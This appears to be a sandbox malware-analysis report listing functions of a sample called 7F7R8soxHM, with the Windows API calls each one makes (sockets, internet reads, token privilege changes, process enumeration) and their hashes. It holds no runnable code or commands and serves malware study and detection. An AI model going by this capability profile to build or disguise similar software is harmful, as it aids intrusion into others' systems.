Part of subcall function 00E71290: DefDlgProcW.USER32(?,00000020,?), ref: 00E712D8

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 4cff6b8997b503114627e850308ed001af3a54f1d3b6aaf31b96139cb0c04d31
Instruction ID: 9bffc5bcbe9df5f98d1ff278de3f133aa10bfa683a4c048ebb43728046be5b72
Opcode Fuzzy Hash: 4cff6b8997b503114627e850308ed001af3a54f1d3b6aaf31b96139cb0c04d31
Instruction Fuzzy Hash: ABA16970105788BAD628AB2C6C44DBF359DDF8A359B24F15EF50AFA192DA10DD01E272

Function 00EE6A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00EE80A0: inet_addr.WSOCK32(00000000), ref: 00EE80CB

socket.WSOCK32(00000002,00000002,00000011), ref: 00EE6AB1
WSAGetLastError.WSOCK32(00000000), ref: 00EE6ADA
bind.WSOCK32(00000000,?,00000010), ref: 00EE6B13
WSAGetLastError.WSOCK32(00000000), ref: 00EE6B20
closesocket.WSOCK32(00000000), ref: 00EE6B34

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: 1ba7b5548406c9ef0d9eb6ddebecc60a0f56f1edc1a1724af323fd419d00bb8a
Instruction ID: 5cd3399b225efbb0fae93ff0ac14b1c97ab30a6959e18818a6a51503673692f7
Opcode Fuzzy Hash: 1ba7b5548406c9ef0d9eb6ddebecc60a0f56f1edc1a1724af323fd419d00bb8a
Instruction Fuzzy Hash: 0E418275640214AFEB10AB649D86F7E77E5DF84720F04D058FA1ABB3D3DA709D018B91

Function 00EF55FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00EF564C
IsWindowEnabled.USER32 ref: 00EF565A
GetForegroundWindow.USER32(?,?,00000001), ref: 00EF5667
IsIconic.USER32 ref: 00EF5675
IsZoomed.USER32 ref: 00EF5683

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: ff0e8659ed2d99806cc2eda389b0d000e82400803c713c15072bc38f97516c91
Instruction ID: 014f499e43d330ddd2c0a91800ed1fef43ab8598299eb7150fbc15d2fe633f73
Opcode Fuzzy Hash: ff0e8659ed2d99806cc2eda389b0d000e82400803c713c15072bc38f97516c91
Instruction Fuzzy Hash: AC11B6323009155FD7115F26DC44B7F7798EF94721B469429E71AF7241CB309901CA95

Function 00EEC304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00EB1D88,?), ref: 00EEC312
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00EEC324

Strings

kernel32.dll, xrefs: 00EEC30D
GetSystemWow64DirectoryW, xrefs: 00EEC31E

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: e152b9e32328f4163f516240563595bd4693c1b84d5e78c1d8ce929e6f813d71
Instruction ID: f19106fdc89d47aaf0988682bfd1a8eb89f23c704f17425cc18ea9297fb8509f
Opcode Fuzzy Hash: e152b9e32328f4163f516240563595bd4693c1b84d5e78c1d8ce929e6f813d71
Instruction Fuzzy Hash: 49E0C270200317CFCB304F2BD804A9676E4EF48709B90D479E895F2310E770D842CB60

Function 00EEF121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00EEF151
Process32FirstW.KERNEL32(00000000,?), ref: 00EEF15F

Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82

Process32NextW.KERNEL32(00000000,?), ref: 00EEF21F
CloseHandle.KERNEL32(00000000,?,?,?), ref: 00EEF22E

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 475dcff6d509da2f67fa074208ceb17ad0670c8e5dccc60a0c0f7c442bfbf0a0
Instruction ID: 69bf57b987b5f34b7f61942af1c465315cd762662c13b28b9d3162ef7b8571c5
Opcode Fuzzy Hash: 475dcff6d509da2f67fa074208ceb17ad0670c8e5dccc60a0c0f7c442bfbf0a0
Instruction Fuzzy Hash: A8517D715043059FD310EF25DC85E6BB7E8FF98710F50982DF599A72A2EB70A908CB92

Function 00ED40B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00ED40D1
_memset.LIBCMT ref: 00ED40F2
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00ED4144
CloseHandle.KERNEL32(00000000), ref: 00ED414D

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: a2a5b293e03e1b33f90e47453ef068324d88352521f547d8ad3c4138881ff13d
Instruction ID: e7f9e24d89909f84eda4927200f473095ccf1047cefca1e598fc7dfad1b4e046
Opcode Fuzzy Hash: a2a5b293e03e1b33f90e47453ef068324d88352521f547d8ad3c4138881ff13d
Instruction Fuzzy Hash: 5C11AB759012287AD7305BA59C4DFABBB7CEF84764F1041A6F908E7290D6744E84CBA4

Function 00ECEB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 00ECEB19

Strings

(, xrefs: 00ECEB5F
|, xrefs: 00ECEB49

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 3a52dbddd1329e1aa123055e8f265ab2e5c04c03c7c8e9ec5dfee90de7b33712
Instruction ID: 614e44b1dac72dcfc8f0015c4eaeb52e1ad19fa5bbe6b7a5748f0dabd38bf717
Opcode Fuzzy Hash: 3a52dbddd1329e1aa123055e8f265ab2e5c04c03c7c8e9ec5dfee90de7b33712
Instruction Fuzzy Hash: AD322575A006059FCB28CF19C581EAAB7F1FF48310B15D56EE89AEB3A1D771E942CB40

Function 00EE25E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00EE26D5
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00EE270C

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: b42a8addd89d124bd6e5aba8b32ac314af606c99c839a63d27ea20116763cd62
Instruction ID: 5b3376bfb26505a21f32c4d64c0a1bb6e6195bd4fb0d0b7c7cd3aa93bb0a805b
Opcode Fuzzy Hash: b42a8addd89d124bd6e5aba8b32ac314af606c99c839a63d27ea20116763cd62
Instruction Fuzzy Hash: 6541D57190024EBFEB20DE96DC85EBBB7FCEB40758F10506EF705B6140EA719E419654

Function 00EDB59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00EDB5AE
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00EDB608
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00EDB655

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 16ea95d2af758aa843e38304d5037bc448d2806e2219c6bfb602b3c5e4e31e41
Instruction ID: 836378fab2864bdac97aeba4f358821aaee722dbda413ed28bda10d639744313
Opcode Fuzzy Hash: 16ea95d2af758aa843e38304d5037bc448d2806e2219c6bfb602b3c5e4e31e41
Instruction Fuzzy Hash: 2B216235A00118EFCB00DF55D880EADBBF8FF88310F1480AAE905AB352DB319916CF51

Function 00EC8CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00E90FF6: std::exception::exception.LIBCMT ref: 00E9102C
Part of subcall function 00E90FF6: __CxxThrowException@8.LIBCMT ref: 00E91041

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EC8D0D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00EC8D3A
GetLastError.KERNEL32 ref: 00EC8D47

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: e365bc77795a737372fd55dba38a061d10eb4862d1d7782641831d5cb68af057
Instruction ID: 7b0e31f35bf6be88041e24455408a00d80ccf44128a59f8e07e0f9cbc6685f5f
Opcode Fuzzy Hash: e365bc77795a737372fd55dba38a061d10eb4862d1d7782641831d5cb68af057
Instruction Fuzzy Hash: 10116DB1514209AFD7289F54DE85D6BBBFCEB44710B20852EF456A2241EF31AC418B60

Function 00ED4C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00ED4C2C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00ED4C43
FreeSid.ADVAPI32(?), ref: 00ED4C53

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 7ee9dce70d9ed97a9b7f2c9c0dca0239eee95fe2dccadad5d83dac8acab15ae4
Instruction ID: 671c71b2a301a32525eab2a65aa8df202d090b04bb2b742b9f98d632a293d196
Opcode Fuzzy Hash: 7ee9dce70d9ed97a9b7f2c9c0dca0239eee95fe2dccadad5d83dac8acab15ae4
Instruction Fuzzy Hash: E4F03775A11208BFDB04DFE09C89ABEBBB8EF08201F0044A9E905E2281E6706A088B50

Function 00E7E060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6170ca6c63bcaa98efede01e4d3699e9a415c86dfb68d37eca32aeb1e1895611
Instruction ID: 994b4e574aeec706a294ae2e4fa253f1851049477479d7f9424e60d9a35fab19
Opcode Fuzzy Hash: 6170ca6c63bcaa98efede01e4d3699e9a415c86dfb68d37eca32aeb1e1895611
Instruction Fuzzy Hash: 3D228D74A00216DFDB24DF64C481AAABBF1FF08304F14D1A9E85ABB351E735AD85CB91

Function 00EDC93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00EDC966
FindClose.KERNEL32(00000000), ref: 00EDC996

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 25273a6558c6ff5d7a3a17bec0fd11a084b5b2002ed65acc075d081338416d5d
Instruction ID: 4a7d9757ca57d1f3ed5acc12c8a0967ea89ad363cd917b0a61e6392d7ed9505a
Opcode Fuzzy Hash: 25273a6558c6ff5d7a3a17bec0fd11a084b5b2002ed65acc075d081338416d5d
Instruction Fuzzy Hash: 34115E726106009FDB10EF29D855A2AF7E9EF84324F10955EF9A9E73A1DB30AC05CB81

Function 00EDA2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00EE977D,?,00EFFB84,?), ref: 00EDA302
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00EE977D,?,00EFFB84,?), ref: 00EDA314

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: c3f0b4f9b6cfe575ee754285653382f869a12a6a8e91a9f8eaed092536444aa7
Instruction ID: 6aac9e024ea3193759e6b5ec6c4eedb8abd3fa0ba0a5655a25aa8146bd4c24fa
Opcode Fuzzy Hash: c3f0b4f9b6cfe575ee754285653382f869a12a6a8e91a9f8eaed092536444aa7
Instruction Fuzzy Hash: C0F0823554522DABEB209FA4CC48FEA776DFF09761F008166F908E6291D6309A44CBA1

Function 00EC8713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00EC8851), ref: 00EC8728
CloseHandle.KERNEL32(?,?,00EC8851), ref: 00EC873A

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: e6ea6f4ee20831e334e83d23cc07144ab14a823aee92c6b1aba4be8bef4f9272
Instruction ID: 3a7e1b37296ca40ed1030ff67921264bad7f8c20cba5186bac23eafa8e71467f
Opcode Fuzzy Hash: e6ea6f4ee20831e334e83d23cc07144ab14a823aee92c6b1aba4be8bef4f9272
Instruction Fuzzy Hash: 8BE08C32000601EFEB212B21ED08E737BE9EF00390724893DF4A6D0430DB23AC90EB10

Function 00E9A395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00E98F97,?,?,?,00000001), ref: 00E9A39A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00E9A3A3

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: d3a1533923a4355211e04f1c234620765ef3e9a8ba2030be9860e3f392d27f1b
Instruction ID: 898a0f0a8d82cde60c61cbfe15c3982d9f87859cfd1fe2a200c39f023561fcc0
Opcode Fuzzy Hash: d3a1533923a4355211e04f1c234620765ef3e9a8ba2030be9860e3f392d27f1b
Instruction Fuzzy Hash: 1DB09231055208AFCA102B92EC09BA83F6AEF84AA2F404020F60D94060EB625454CA95

Function 00E9F419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17b0df1f3d3cf0f75fd7b06608c2d97b4929385d1070cf5eb02f056ac87af66b
Instruction ID: 0bdc4877c84d47f63c596da6b0c3431c895fa5e12972ce2df737262353e7dad0
Opcode Fuzzy Hash: 17b0df1f3d3cf0f75fd7b06608c2d97b4929385d1070cf5eb02f056ac87af66b
Instruction Fuzzy Hash: 55321562D69F054DDB23A634D832336B248AFB73D4F15E737E819F59AAEB28D4835100

Function 00EA267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 260ac2c6e0349d2853333388215821b06d7d33938266ba421d52f8139d747ebb
Instruction ID: b0c45ff74c3257430dff48638cc421c35fe2200d2c55e16288a5784cf2f9ad5a
Opcode Fuzzy Hash: 260ac2c6e0349d2853333388215821b06d7d33938266ba421d52f8139d747ebb
Instruction Fuzzy Hash: 95B1FF20E2AF454DD32396398831336BA9CBFBB2D5F52D71BFC2674D62EB2285835141

Function 00ED8B13 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 00ED8B25

Part of subcall function 00E9543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00ED91F8,00000000,?,?,?,?,00ED93A9,00000000,?), ref: 00E95443
Part of subcall function 00E9543A: __aulldiv.LIBCMT ref: 00E95463

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
